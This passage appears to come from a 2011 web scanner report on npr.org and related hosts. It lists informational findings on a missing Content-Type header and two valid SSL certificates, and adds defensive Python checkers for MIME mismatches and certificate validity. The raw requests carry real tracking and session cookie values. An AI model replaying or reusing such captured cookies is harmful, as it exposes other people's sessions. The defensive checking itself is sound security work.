Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:19 GMT
Content-Length: 239

By <a class="linkedBylineName" href="http://content.usatoday.com/topics/reporter/William+M.+Welch">William M. Welch</a> and <a class="linkedBylineName" href="http://content.usatoday.com/topics/reporte
...[SNIP]...

26. Content type is not specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-Type header which correctly and unambiguously states the MIME type of the content in the response body. Sending X-Content-Type-Options: nosniff alongside it stops browsers that support the header from second-guessing the declared type, which is what turns a stray Content-Type into a rendering or script-execution problem.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B2402651
...[SNIP]...
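The two issue classes in sections 25 and 26 (declared Content-Type disagreeing with the body, and no Content-Type at all) are cheap to check offline over captured responses. The checker below is an added example, not the scanner's own detection logic and not code from any of the sites above; its sniffing rules are a deliberately small approximation of browser MIME sniffing, and the sample responses are constructed, modelled on the favicon, ScriptResource.axd, resize.php and PortalServe responses in this report (bodies shortened to their leading bytes).

```python
import re

# Added example: offline checker for Content-Type vs. body mismatches and
# missing Content-Type / nosniff. Not the scanner's logic; the sniffing
# rules are a small approximation of what browsers do.

SCRIPT_TYPES = {"text/javascript", "application/javascript",
                "application/x-javascript"}
SNIFF_LIMIT = 512  # browsers only inspect the first few hundred bytes


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into {lower-case name: value} and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # element 0 is the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body


def declared_type(headers):
    """MIME type from Content-Type with parameters such as charset stripped."""
    value = headers.get("content-type")
    return None if value is None else value.split(";")[0].strip().lower()


def sniff_body(body: bytes) -> str:
    """Guess a MIME type from the leading bytes, roughly as a browser would."""
    head = body[:SNIFF_LIMIT]
    if head.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"          # JPEG SOI marker (JFIF/Exif follow)
    if head.startswith(b"\x00\x00\x01\x00"):
        return "image/x-icon"        # ICONDIR: reserved=0, type=1 (icon)
    if head.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if head.startswith((b"GIF87a", b"GIF89a")):
        return "image/gif"
    text = head.lstrip()
    # Script: a comment, a keyword, or an identifier followed by '=' or '('
    if re.match(rb"(/\*|//|var\s|function\s|[A-Za-z_$][\w$.]*\s*[=(])", text):
        return "text/javascript"
    if re.search(rb"<(!doctype|html|body|div|a|span|script|iframe)\b", text, re.I):
        return "text/html"
    if all(32 <= b < 127 or b in b"\r\n\t" for b in text):
        return "text/plain"
    return "application/octet-stream"


def family(mime):
    """Collapse the JavaScript MIME aliases so they compare equal."""
    return "script" if mime in SCRIPT_TYPES else mime


def check_response(raw: bytes) -> list:
    """Return human-readable findings for one raw response (empty = clean)."""
    headers, body = parse_response(raw)
    findings = []
    declared, sniffed = declared_type(headers), sniff_body(body)
    if declared is None:
        findings.append(f"no Content-Type; a browser would sniff the body as {sniffed}")
    elif family(declared) != family(sniffed):
        findings.append(f"declared {declared} but body looks like {sniffed}")
    if headers.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    return findings


# Constructed samples modelled on responses in this report. ICO_BYTES is a
# 22-byte ICONDIR/ICONDIRENTRY header plus the start of a BITMAPINFOHEADER
# (the two 0x28 '(' bytes visible in the favicon dumps); JPEG_BYTES is the
# SOI/APP0/JFIF prefix of the resize.php responses.
ICO_BYTES = (b"\x00\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x04\x00"
             b"(\x01\x00\x00\x16\x00\x00\x00(\x00\x00\x00")
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"

ICON_AS_TEXT = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                b"Content-Type: text/plain; charset=UTF-8\r\n\r\n" + ICO_BYTES)
NO_CONTENT_TYPE = (b"HTTP/1.1 200 OK\r\nCache-Control: no-cache\r\n\r\n"
                   b"document.write(\"<iframe id='x' src='...'></iframe>\");")
SCRIPT_AS_HTML = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
                  b"var Sys = new Array();Sys.Application = new Array();")
JPEG_OK = b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n" + JPEG_BYTES
ICON_FIXED = (b"HTTP/1.1 200 OK\r\nContent-Type: image/x-icon\r\n"
              b"X-Content-Type-Options: nosniff\r\n\r\n" + ICO_BYTES)

if __name__ == "__main__":
    for name, raw in [("icon as text", ICON_AS_TEXT), ("no content-type", NO_CONTENT_TYPE),
                      ("script as html", SCRIPT_AS_HTML), ("jpeg ok", JPEG_OK),
                      ("icon fixed", ICON_FIXED)]:
        print(f"{name:16} {check_response(raw) or ['clean']}")
```

The checker compares MIME families rather than exact strings so that text/javascript, application/javascript and application/x-javascript are all accepted for a script body, and it reports a missing nosniff header separately because that header is what makes a correct Content-Type binding on the browser.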

27. SSL certificate
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
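The three requirements named above (name matches the host, issuer is trusted, date is within the validity window) are what a client verifies before it trusts a connection. The example below is added here and is not code from the scanner or from either site; it applies those checks to certificate records in the dictionary shape that Python's ssl.getpeercert() returns. The two records are constructed from the certificates listed in 27.1 and 27.2 (validity windows converted from CST/CDT to UTC), and the trust store is a name-only stand-in for real chain and signature verification.

```python
from datetime import datetime, timezone

# Added example: hostname, issuer and validity checks over getpeercert()-style
# records. Records are constructed from the two certificates in this section;
# the issuer set is an assumed, name-only stand-in for a real trust store.

TRUSTED_ISSUERS = {"Thawte Premium Server CA", "Equifax Secure Certificate Authority"}
# Time this report was generated (Mon May 09 10:47:30 CDT 2011), in UTC
REPORT_TIME = datetime(2011, 5, 9, 15, 47, 30, tzinfo=timezone.utc)

SHOP_NPR = {
    "subject": ((("commonName", "shop.npr.org"),),),
    "subjectAltName": (("DNS", "shop.npr.org"),),
    "issuer": ((("commonName", "Thawte Premium Server CA"),),),
    "notBefore": "2009-12-15T00:00:00Z",
    "notAfter": "2011-12-16T23:59:59Z",
}
GROUPON = {
    "subject": ((("commonName", "*.groupon.com"),),),
    "subjectAltName": (("DNS", "*.groupon.com"),),
    "issuer": ((("commonName", "Equifax Secure Certificate Authority"),),),
    "notBefore": "2009-07-23T12:09:04Z",
    "notAfter": "2011-07-24T23:57:32Z",
}


def common_name(name):
    """Pull commonName out of a getpeercert()-style sequence of RDNs."""
    for rdn in name:
        for key, value in rdn:
            if key == "commonName":
                return value
    return None


def dns_names(cert):
    """Names the certificate is valid for: SAN DNS entries, else the subject CN."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    return names or [common_name(cert["subject"])]


def hostname_matches(pattern, hostname):
    """RFC 6125-style comparison: one leading '*' covers exactly one label."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    if not pattern.startswith("*.") or "*" in pattern[1:]:
        return False
    # '*.groupon.com' matches 'www.groupon.com', not 'groupon.com' or 'a.b.groupon.com'
    return hostname.endswith(pattern[1:]) and hostname.count(".") == pattern.count(".")


def parse_utc(stamp):
    """Parse the ISO-8601 UTC timestamps used in the records above."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def validate(cert, hostname, now=REPORT_TIME, trusted=TRUSTED_ISSUERS):
    """Return the failed checks; an empty list means all three checks passed."""
    problems = []
    if not any(hostname_matches(name, hostname) for name in dns_names(cert)):
        problems.append(f"hostname {hostname} not covered by {dns_names(cert)}")
    issuer = common_name(cert["issuer"])
    if issuer not in trusted:
        problems.append(f"issuer not trusted: {issuer}")
    if not parse_utc(cert["notBefore"]) <= now <= parse_utc(cert["notAfter"]):
        problems.append(f"outside validity period at {now.isoformat()}")
    return problems


if __name__ == "__main__":
    print(validate(SHOP_NPR, "shop.npr.org"))                        # []
    print(validate(GROUPON, "www.groupon.com"))                       # []
    print(validate(GROUPON, "groupon.com"))                           # wildcard does not cover the bare domain
    print(validate(GROUPON, "www.groupon.com", now=parse_utc("2011-08-01T00:00:00Z")))  # expired
```

Both certificates pass at the report's timestamp; the wildcard record illustrates the one-label rule, and moving the clock past 24 July 2011 shows how the Groupon certificate would fail the date check alone while the other two checks still pass.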



27.1. https://shop.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.npr.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  shop.npr.org
Issued by:  Thawte Premium Server CA
Valid from:  Mon Dec 14 18:00:00 CST 2009
Valid to:  Fri Dec 16 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

27.2. https://www.groupon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.groupon.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Thu Jul 23 07:09:04 CDT 2009
Valid to:  Sun Jul 24 18:57:32 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
